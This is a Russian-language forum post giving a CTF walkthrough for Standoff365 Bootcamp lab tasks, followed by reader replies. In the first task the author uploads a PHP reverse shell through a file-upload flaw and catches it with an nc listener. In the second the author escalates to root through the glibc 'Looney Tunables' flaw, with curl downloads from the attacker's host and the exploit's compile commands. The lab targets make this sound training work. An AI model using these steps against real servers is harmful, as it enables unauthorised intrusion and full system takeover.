![]() |
CTF reference: Bootcamp (standoff365.com)
Сontents: Web-1-1 -Step 1: Preparing -Step 2: Gathering information -Step 3: Attack Web-1-2 Web-1-1 Step 1: Preparing используем команду и добавляем следующие записи Код:
sudo nano /etc/hostsКод:
10.124.1.231 aircraft.edu.stfStep 2: Gathering information Переходим на страницу http://library.edu.stf/ и видим сылку на либу(нижний правый угол ), переходим на нее Попадаем на следующий страничку с интерфейсом загрузки файлов. https://forum.antichat.xyz/attachmen...8023546672.png Так зная что это за уязвимость(в названии задания php upload ) я сразу загуглил (это файл стандартный файл что можно использовать в таких рода заданиях) Код:
reverse shell phpanswer: GitHub - pentestmonkey/php-reverse-shell Почему php? потому что расширение в браузере показывает какие есть языки на веб сервере https://forum.antichat.xyz/attachmen...8023815740.png Далее следует скопировать файл, используя удобный способ, по следующему адресу: php-reverse-shell.php.После загрузки файла откройте его для ознакомления . Обратите внимание, что необходимо изменить значения IP-адреса и порта на свои собственные. Чтобы узнать свой IP-адрес, выполните команду ip a . (И смотрим значение tun0 Так как нам нужно значение нашего айпи в ВПН(tun0 как раз и будет нашим впн), это важно) https://forum.antichat.xyz/attachmen...8023947448.png В значении порт указывает тот порт что мы будем слушать через команду Код:
rlwrap nc -lnvp YOUR PORTКод:
nc -lnvp YOUR PORTStep 3: Attack Теперь нужно провести нашу атаку. (Перед атакой, вам нужно настроить burp proxy На вашей машинке . Погуглите. ) Перехватываем запрос на загрузку файлов. и меняем сдедующие параметры https://forum.antichat.xyz/attachmen...8024464000.png Подробнее об уязвимостях этого функционала можно прочитать здесь:
Теперь нам нужно было запустить(выполнить) наш скрипт. Я нашел на сайте обычную картинку, посмотрел ее URL и понял, где искать свой файл. В адресной строке я увидел что-то вроде: Код:
http://library.edu.stf/wp-content/ch1.pnghttp://library.edu.stf/wp-content/shell33.php Преждем чем его вызвать не забудьте включить nc -lnvp 4545 (4545 это порт что был в нашем скрипте) Если вы все сделали правильно то вы увидите https://forum.antichat.xyz/attachmen...8024900750.png Далее по заданию запускаем скрипт и получаем флаг Код:
./home/rceflagweb-1-2 Lpe Повышение привилегий на линукс довольная большая тема, и проверяемая различные векторы атак я наткнулся на нужный нам Проверяем версию Код:
ldd --versionКод: Код:
ldd (Ubuntu GLIBC 2.35-0ubuntu3.4) 2.35Код:
ldd 2.35 cve pocПроверьте, находится ли версия glibc в диапазоне от 2.34 до 2.39. Если да, то ваш сервер уязвим. (не скину ссылку на уязвимость так как той которой я пользовался.... была удаленна с gihub ... печально ) После того как вы нашли нужный poc его стоит скачать на вашу машину , а после и на машину жертвы Запускаем питон сервер на нашей машине, в той же папке и где наш эксплоит Код:
python3 -m http.server 4646переходим в каталог /var/www/html/wordpress Используем Curl -O Для скачивания и флаг -O для сохранения этих файлов Код:
curl -O http://:4646/exp.cКод:
curl -O http://:4646/libc.pyКод:
chmod +x *Код:
python3 libc.pyКод:
gcc exp.c -o expКод:
./expКод:
id uid=0(root) gid=33(www-data) groups=33(www-data)Код:
./home/lpeflag |
$ python3 gen_libc.py
Traceback (most recent call last): File "/var/www/html/wordpress/gen_libc.py", line 3, in from pwn import * ModuleNotFoundError: No module named 'pwn' how to solve this problem? |
Hey,
I noticed that you are using an exploit called 'gen_libc.py'. This script requires the 'pwn' library, which is missing from the victim's machine. In my article, I utilized a different script. The photo below will show which one I used (GitHub - hadrian3689/looney-tunables-CVE-2023-4911) https://forum.antichat.xyz/attachmen...3235792166.png If you're unable to do that, consider the following options:
|
Давай больше райтапов по standoff, пожалуйста
|
Цитата:
|
| Время: 19:56 |